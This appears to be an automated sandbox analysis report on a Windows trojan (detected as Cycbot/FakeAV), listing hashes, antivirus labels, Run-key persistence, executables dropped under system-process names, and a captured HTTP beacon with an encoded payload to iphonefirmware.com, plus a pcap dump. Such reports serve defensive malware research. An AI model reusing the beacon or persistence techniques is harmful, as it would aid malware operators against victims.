Analysis Date2014-06-15 12:57:26
MD5bb097b031e7c512aaa51640243777131
SHA10016434bd74949f750b54b11a434aa391f96b732

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386
Section.text md5: 7ee4a0d2cbd4371b99fc364f6c084ed6 sha1: 4dcf5b933241ae223cbc05cac81a36a71d8ebd5f size: 184832
Section.rdata md5: c96e146b0cbc15a70a592d84f30b0143 sha1: 8efb8ce9674ab61d656c02511f70fb458b961bcb size: 2048
Section.data md5: 280702121e227615664c1e75dbf619f0 sha1: 2a0f71844a8395116a5724c38afb70ccee2fd2e6 size: 19968
Section.lib md5: b5e79b6c246ee87c3d9b3eccfa5ec120 sha1: aad1342006de9a094409b394d99c17e2f10d3d6e size: 512
Timestamp2005-11-25 01:03:13
VersionPrivateBuild: 1562
PEhash2d28eee76ef44393ea296cb57382b401fd8d1778
IMPhashad01fc5ce8d32741e683261793d7c4d5
AV360 SafeTrojan.Generic.KD.132323
AV360 SafeTrojan.Generic.KD.132323
AVAd-AwareTrojan.Generic.KD.132323
AVAd-AwareTrojan.Generic.KD.132323
AVAlwil (avast)Cybota [Trj]
AVAlwil (avast)Cybota [Trj]
AVArcabit (arcavir)no_virus
AVArcabit (arcavir)no_virus
AVAuthentiumW32/Goolbot.E.gen!Eldorado
AVAuthentiumW32/Goolbot.E.gen!Eldorado
AVAvira (antivir)TR/Kazy.12051.psa
AVAvira (antivir)TR/Kazy.12051.psa
AVCA (E-Trust Ino)Win32/Diple.A!generic
AVCA (E-Trust Ino)Win32/Diple.A!generic
AVCAT (quickheal)Backdoor.Cycbot.B
AVCAT (quickheal)Backdoor.Cycbot.B
AVClamAVWin.Trojan.132323
AVClamAVWin.Trojan.132323
AVDr. WebTrojan.DownLoader2.62290
AVDr. WebTrojan.DownLoader2.62290
AVEmsisoftTrojan.Generic.KD.132323
AVEmsisoftTrojan.Generic.KD.132323
AVEset (nod32)Win32/Kryptik.KQK
AVEset (nod32)Win32/Kryptik.KQK
AVFortinetW32/Katusha.O!tr
AVFortinetW32/Katusha.O!tr
AVFrisk (f-prot)W32/Goolbot.E.gen!Eldorado (generic, not disinfectable)
AVFrisk (f-prot)W32/Goolbot.E.gen!Eldorado (generic, not disinfectable)
AVF-SecureTrojan.Generic.KD.132323
AVF-SecureTrojan.Generic.KD.132323
AVGrisoft (avg)Generic_r.FN
AVGrisoft (avg)Generic_r.FN
AVIkarusBackdoor.Win32.Cycbot
AVIkarusBackdoor.Win32.Cycbot
AVKasperskyTrojan.Win32.Generic
AVKasperskyTrojan.Win32.Generic
AVMalwareBytesSpyware.Passwords.XGen
AVMalwareBytesSpyware.Passwords.XGen
AVMcafeeBackDoor-EXI.gen.h
AVMcafeeBackDoor-EXI.gen.h
AVMicrosoft Security EssentialsBackdoor:Win32/Cycbot.G
AVMicrosoft Security EssentialsBackdoor:Win32/Cycbot.G
AVMicroWorld (escan)Trojan.Generic.KD.132323
AVMicroWorld (escan)Trojan.Generic.KD.132323
AVNormanwinpe/FakeAV.ACWY
AVNormanwinpe/FakeAV.ACWY
AVRisingno_virus
AVRisingno_virus
AVSophosMal/FakeAV-IS
AVSophosMal/FakeAV-IS
AVSymantecTrojan.Gen.2
AVSymantecTrojan.Gen.2
AVTrend MicroBKDR_CYCBOT.SME3
AVTrend MicroBKDR_CYCBOT.SME3
AVVirusBlokAda (vba32)no_virus

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
1
RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\conhost ➝
C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates FileC:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates Mutex{A5B35993-9674-43cd-8AC7-5BC5013E617B}
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutex{61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex{7791C364-DE4E-4000-9E92-9CCAFDDD90DC}
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNSdlsystemone.com
Winsock DNS127.0.0.1
Winsock DNSiphonefirmware.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data

Creates ProcessC:\Documents and Settings\Administrator\Application Data\dwm.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Network Details:

DNSiphonefirmware.com
Type: A
173.248.187.249
DNSdlsystemone.com
Type: A
HTTP GEThttp://iphonefirmware.com/wp-content/uploads/2010/06/wifiicon.jpg?tq=gP4aKydWBRdzxqTNy1F8PktrTgcvT%2BpXvvNFU2O8Ffb5cv3HLXaOosVspc0GrZog6amsMDKgOhALkbkpqmo1B32%2BH%2BX9lRUmPmb9HGkrj%2BTRRYhcYK3agsaM1vN8INzQ381gOnjFNeeyrN1IcrOkQzI88Yeqc1PH5C78nORVTpnX7hpU%2Bx28W0H2jgSwqwuzdi36dj0E9I3oJ%2BFpGE3K8Xgjyuw15oY7rDvB1OV5ThWMbLRu9MZ1JFbrxsBiREXHsNt6538dedMr7wUMqxkmFkA1pBNe6syAon3NwHwYlkguwVYqWcfE5dWqiVcS9IwOl7Vhik7Rwfb9CijxHzT4sZnxiQ2lhAaYtwReY3jwI0F%2F6%2F%2BIHgIpm%2B5zzajAv94HHuytZpxf0NmdfVxZeJGAw1VYcbqLtlSC8d%2F2tgtD8QG%2F6KDJSYVlRnDHm7UtlhvySmBgdGfHpntLRH%2BCtz8%2FR7LoXipPfaY%2FTvAUwCPQC5isv1os2EE25Y0k54xYi2WQHhD6u7EJPuu
User-Agent: opera/8.11
Flows TCP192.168.1.1:1031 ➝ 173.248.187.249:80

Raw Pcap
0x00000000 (00000)   47455420 2f77702d 636f6e74 656e742f   GET /wp-content/
0x00000010 (00016)   75706c6f 6164732f 32303130 2f30362f   uploads/2010/06/
0x00000020 (00032)   77696669 69636f6e 2e6a7067 3f74713d   wifiicon.jpg?tq=
0x00000030 (00048)   67503461 4b796457 4252647a 7871544e   gP4aKydWBRdzxqTN
0x00000040 (00064)   79314638 506b7472 54676376 54253242   y1F8PktrTgcvT%2B
0x00000050 (00080)   70587676 4e465532 4f384666 62356376   pXvvNFU2O8Ffb5cv
0x00000060 (00096)   33484c58 614f6f73 56737063 3047725a   3HLXaOosVspc0GrZ
0x00000070 (00112)   6f673661 6d734d44 4b674f68 414c6b62   og6amsMDKgOhALkb
0x00000080 (00128)   6b70716d 6f314233 32253242 48253242   kpqmo1B32%2BH%2B
0x00000090 (00144)   58396c52 556d506d 62394847 6b726a25   X9lRUmPmb9HGkrj%
0x000000a0 (00160)   32425452 52596863 594b3361 6773614d   2BTRRYhcYK3agsaM
0x000000b0 (00176)   31764e38 494e7a51 33383167 4f6e6a46   1vN8INzQ381gOnjF
0x000000c0 (00192)   4e656579 724e3149 63724f6b 517a4938   NeeyrN1IcrOkQzI8
0x000000d0 (00208)   38596571 63315048 35433738 6e4f5256   8Yeqc1PH5C78nORV
0x000000e0 (00224)   54706e58 37687055 25324278 32385730   TpnX7hpU%2Bx28W0
0x000000f0 (00240)   48326a67 53777177 757a6469 3336646a   H2jgSwqwuzdi36dj
0x00000100 (00256)   30453949 336f4a25 32424670 4745334b   0E9I3oJ%2BFpGE3K
0x00000110 (00272)   3858676a 79757731 356f5937 72447642   8Xgjyuw15oY7rDvB
0x00000120 (00288)   314f5635 5468574d 624c5275 394d5a31   1OV5ThWMbLRu9MZ1
0x00000130 (00304)   4a466272 78734269 52455848 734e7436   JFbrxsBiREXHsNt6
0x00000140 (00320)   35333864 65644d72 3777554d 71786b6d   538dedMr7wUMqxkm
0x00000150 (00336)   466b4131 70424e65 36737941 6f6e334e   FkA1pBNe6syAon3N
0x00000160 (00352)   77487759 6c6b6775 77565971 57636645   wHwYlkguwVYqWcfE
0x00000170 (00368)   35645771 69566353 3949774f 6c375668   5dWqiVcS9IwOl7Vh
0x00000180 (00384)   696b3752 77666239 43696a78 487a5434   ik7Rwfb9CijxHzT4
0x00000190 (00400)   735a6e78 6951326c 68416159 74775265   sZnxiQ2lhAaYtwRe
0x000001a0 (00416)   59336a77 49304625 32463625 32462532   Y3jwI0F%2F6%2F%2
0x000001b0 (00432)   42494867 49706d25 3242357a 7a616a41   BIHgIpm%2B5zzajA
0x000001c0 (00448)   76393448 48757974 5a707866 304e6d64   v94HHuytZpxf0Nmd
0x000001d0 (00464)   6656785a 654a4741 77315659 6362714c   fVxZeJGAw1VYcbqL
0x000001e0 (00480)   746c5343 38642532 46327467 74443851   tlSC8d%2F2tgtD8Q
0x000001f0 (00496)   47253246 364b444a 5359566c 526e4448   G%2F6KDJSYVlRnDH
0x00000200 (00512)   6d375574 6c687679 536d4267 64476648   m7UtlhvySmBgdGfH
0x00000210 (00528)   706e744c 52482532 4243747a 38253246   pntLRH%2BCtz8%2F
0x00000220 (00544)   52374c6f 58697050 66615925 32465476   R7LoXipPfaY%2FTv
0x00000230 (00560)   41557743 50514335 69737631 6f733245   AUwCPQC5isv1os2E
0x00000240 (00576)   45323559 306b3534 78596932 57514868   E25Y0k54xYi2WQHh
0x00000250 (00592)   44367537 454a5075 75204854 54502f31   D6u7EJPuu HTTP/1
0x00000260 (00608)   2e300d0a 436f6e6e 65637469 6f6e3a20   .0..Connection: 
0x00000270 (00624)   636c6f73 650d0a48 6f73743a 20697068   close..Host: iph
0x00000280 (00640)   6f6e6566 69726d77 6172652e 636f6d0d   onefirmware.com.
0x00000290 (00656)   0a416363 6570743a 202a2f2a 0d0a5573   .Accept: */*..Us
0x000002a0 (00672)   65722d41 67656e74 3a206f70 6572612f   er-Agent: opera/
0x000002b0 (00688)   382e3131 0d0a0d0a                     8.11....


Strings
.
.
..
..
..

040904b0
1562
PrivateBuild
StringFileInfo
TIMES NEW ROMAN
Translation
VarFileInfo
VS_VERSION_INFO
%)$14amI
$}1']NX
4ILn,#
(4Llng
4niR\Ci
\*4q:e
5|5vJ%
5|=UYd
5VfKyv
;7H4-#
7lZ)?u
8Hx{OM|
8.OgL3
9g6F$K
9'G/wfB
ADVAPI32.dll
AreFileApisANSI
BeginUpdateResourceW
>bi8S{
BSaQ]Xr"y
bVyV2<
{b$-X_
CharNextA
CharNextW
	$C' iV
CommandLineToArgvW
CopyFileA
CopyFileW
CreateDirectoryA
CreateDirectoryW
CreateFiberEx
CryptAcquireContextA
CryptCreateHash
CryptDestroyHash
CryptGetHashParam
CryptHashData
CryptReleaseContext
D2A{Ow
@.data
DebugBreak
DeleteFileA
DeleteFileW
DqP#s:
e#i(AV*
EndUpdateResourceW
EnumResourceNamesW
EscapeCommFunction
FatalExit
F>ic+S
FindClose
FreeLibrary
G7Y`5{^-
GetFileAttributesA
GetFileAttributesW
GetFileInformationByHandle
GetFullPathNameA
GetFullPathNameW
GetOEMCP
GetProcessMemoryInfo
>[&<H4M= 
HY`{l|
i8w_l{
ia!)^e
ICInfo
ImageDirectoryEntryToData
ImageGetDigestStream
imagehlp.dll
ImageNtHeader
ImageRvaToVa
_J'<`2*
)	JkWu
JRichu
KERNEL32.dll
Km~?B9
>[+lhs
L=/lU(Q
LoadLibraryExA
LoadLibraryExW
lstrlenA
MonitorFromWindow
MSVFW32.dll
njh+!l
|?O>9|(
OutputDebugStringA
*{OxK?
"pJ'\B
PSAPI.DLL
QVzEoD
`.rdata
ReadFile
RemoveDirectoryA
RemoveDirectoryW
SetFileAttributesA
SetFileAttributesW
SHELL32.dll
s>Vm)m<V
$:<{Sx
t_>8j@
!This program cannot be run in DOS mode.
TX(*m$
UpdateResourceW
USER32.dll
VefpWZ
"#!~W\<
wsprintfW
WUhv5v
XEraG]
_X}H46
-xnN_c.
xX9bo7
-Yn[(!
y%p+1P+
)Z|;7La
Z]?TZU
ZxD"pN$